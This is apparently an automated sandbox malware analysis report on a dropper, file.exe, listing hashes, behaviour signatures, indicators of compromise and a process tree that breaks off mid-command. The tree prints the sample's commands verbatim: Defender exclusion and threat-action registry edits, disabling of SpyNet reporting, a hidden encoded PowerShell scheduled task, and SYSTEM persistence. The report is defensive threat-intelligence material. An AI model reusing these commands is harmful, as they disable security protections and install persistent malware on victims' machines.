Analysis
-
max time kernel
118s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2022, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
1a2acd7c45d937ad3785220922543b09
-
SHA1
40d99901e46e1397c8e2dcd65dd49d438e2c597e
-
SHA256
e3d3c44e137161d9cdaa90d7ddc11e93d6503f0b5c379aa5a8c5a94964bb38dd
-
SHA512
5d9ebcd2613aeb33eeff7660cdf30b01be22094ab98d26c36065d859afc82f4c82045c168136087c135035c72b4e221bfa8a9ecc6c94bcf0bbf2a77066f47364
-
SSDEEP
196608:91OjRq12f9hGsxoXImK8GpJ+kI56Gs2BORKL0I:3O9AsJk2JMkI56GVORKL0I
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 54 3132 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 3780 Install.exe 1332 Install.exe 536 OIxMpta.exe 224 fGJUNRv.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation fGJUNRv.exe -
Loads dropped DLL 1 IoCs
pid Process 3132 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json fGJUNRv.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json fGJUNRv.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini fGJUNRv.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fGJUNRv.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 fGJUNRv.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OIxMpta.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 fGJUNRv.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 fGJUNRv.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 fGJUNRv.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OIxMpta.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData fGJUNRv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 fGJUNRv.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\cYHKasq.xml fGJUNRv.exe File created C:\Program Files (x86)\QrhBhAIewKJHC\tDvEKzN.xml fGJUNRv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fGJUNRv.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi fGJUNRv.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fGJUNRv.exe File created C:\Program Files (x86)\vckoWffGU\wGZJCwz.xml fGJUNRv.exe File created C:\Program Files (x86)\ryYNpJDBUybU2\AAbESsS.xml fGJUNRv.exe File created C:\Program Files (x86)\rJaJUqPnDsUn\EVYlFEl.dll fGJUNRv.exe File created C:\Program Files (x86)\vckoWffGU\XCyXDP.dll fGJUNRv.exe File created C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\DKnuCvh.dll fGJUNRv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fGJUNRv.exe File created C:\Program Files (x86)\ryYNpJDBUybU2\dXKCuykXEDtPX.dll fGJUNRv.exe File created C:\Program Files (x86)\QrhBhAIewKJHC\JKxFyHF.dll fGJUNRv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi fGJUNRv.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\EdnsbscYxaTlTxMBg.job schtasks.exe File created C:\Windows\Tasks\bpCIAYFeZyKMHikKBh.job schtasks.exe File created C:\Windows\Tasks\sowxjEWsCulfsCpcT.job schtasks.exe File created C:\Windows\Tasks\gxWNFYjnrIlwkwP.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4532 schtasks.exe 1904 schtasks.exe 2676 schtasks.exe 828 schtasks.exe 2972 schtasks.exe 2724 schtasks.exe 4516 schtasks.exe 4016 schtasks.exe 4976 schtasks.exe 852 schtasks.exe 4732 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000} fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket fGJUNRv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" fGJUNRv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 2424 powershell.EXE 2424 powershell.EXE 1980 powershell.exe 1980 powershell.exe 1700 powershell.exe 1700 powershell.exe 4704 powershell.EXE 4704 powershell.EXE 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe 224 fGJUNRv.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2424 powershell.EXE Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 4704 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4900 wrote to memory of 3780 4900 file.exe 83 PID 4900 wrote to memory of 3780 4900 file.exe 83 PID 4900 wrote to memory of 3780 4900 file.exe 83 PID 3780 wrote to memory of 1332 3780 Install.exe 84 PID 3780 wrote to memory of 1332 3780 Install.exe 84 PID 3780 wrote to memory of 1332 3780 Install.exe 84 PID 1332 wrote to memory of 1060 1332 Install.exe 87 PID 1332 wrote to memory of 1060 1332 Install.exe 87 PID 1332 wrote to memory of 1060 1332 Install.exe 87 PID 1332 wrote to memory of 716 1332 Install.exe 90 PID 1332 wrote to memory of 716 1332 Install.exe 90 PID 1332 wrote to memory of 716 1332 Install.exe 90 PID 1060 wrote to memory of 2220 1060 forfiles.exe 92 PID 1060 wrote to memory of 2220 1060 forfiles.exe 92 PID 1060 wrote to memory of 2220 1060 forfiles.exe 92 PID 716 wrote to memory of 3060 716 forfiles.exe 93 PID 716 wrote to memory of 3060 716 forfiles.exe 93 PID 716 wrote to memory of 3060 716 forfiles.exe 93 PID 2220 wrote to memory of 1624 2220 cmd.exe 94 PID 2220 wrote to memory of 1624 2220 cmd.exe 94 PID 2220 wrote to memory of 1624 2220 cmd.exe 94 PID 3060 wrote to memory of 3952 3060 cmd.exe 95 PID 3060 wrote to memory of 3952 3060 cmd.exe 95 PID 3060 wrote to memory of 3952 3060 cmd.exe 95 PID 2220 wrote to memory of 204 2220 cmd.exe 96 PID 2220 wrote to memory of 204 2220 cmd.exe 96 PID 2220 wrote to memory of 204 2220 cmd.exe 96 PID 3060 wrote to memory of 2004 3060 cmd.exe 97 PID 3060 wrote to memory of 2004 3060 cmd.exe 97 PID 3060 wrote to memory of 2004 3060 cmd.exe 97 PID 1332 wrote to memory of 852 1332 Install.exe 99 PID 1332 wrote to memory of 852 1332 Install.exe 99 PID 1332 wrote to memory of 852 1332 Install.exe 99 PID 1332 wrote to memory of 2852 1332 Install.exe 101 PID 1332 wrote to memory of 2852 1332 Install.exe 101 PID 1332 wrote to memory of 2852 1332 Install.exe 101 PID 2424 wrote to memory of 3940 2424 powershell.EXE 107 PID 2424 wrote to memory of 3940 2424 powershell.EXE 107 PID 1332 wrote to memory of 1888 1332 Install.exe 112 PID 1332 wrote to memory of 1888 1332 Install.exe 112 PID 1332 wrote to memory of 1888 1332 Install.exe 112 PID 1332 wrote to memory of 4732 1332 Install.exe 114 PID 1332 wrote to memory of 4732 1332 Install.exe 114 PID 1332 wrote to memory of 4732 1332 Install.exe 114 PID 536 wrote to memory of 1980 536 OIxMpta.exe 118 PID 536 wrote to memory of 1980 536 OIxMpta.exe 118 PID 536 wrote to memory of 1980 536 OIxMpta.exe 118 PID 1980 wrote to memory of 3964 1980 powershell.exe 120 PID 1980 wrote to memory of 3964 1980 powershell.exe 120 PID 1980 wrote to memory of 3964 1980 powershell.exe 120 PID 3964 wrote to memory of 3036 3964 cmd.exe 121 PID 3964 wrote to memory of 3036 3964 cmd.exe 121 PID 3964 wrote to memory of 3036 3964 cmd.exe 121 PID 1980 wrote to memory of 4468 1980 powershell.exe 122 PID 1980 wrote to memory of 4468 1980 powershell.exe 122 PID 1980 wrote to memory of 4468 1980 powershell.exe 122 PID 1980 wrote to memory of 4844 1980 powershell.exe 123 PID 1980 wrote to memory of 4844 1980 powershell.exe 123 PID 1980 wrote to memory of 4844 1980 powershell.exe 123 PID 1980 wrote to memory of 2972 1980 powershell.exe 124 PID 1980 wrote to memory of 2972 1980 powershell.exe 124 PID 1980 wrote to memory of 2972 1980 powershell.exe 124 PID 1980 wrote to memory of 4556 1980 powershell.exe 125 PID 1980 wrote to memory of 4556 1980 powershell.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\7zS8F44.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\7zS9252.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1624
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:204
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3952
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2004
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkchCbUhU" /SC once /ST 00:41:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkchCbUhU"4⤵PID:2852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkchCbUhU"4⤵PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bpCIAYFeZyKMHikKBh" /SC once /ST 03:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\OIxMpta.exe\" ux /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4732
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3940
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3024
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\OIxMpta.exeC:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\OIxMpta.exe ux /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 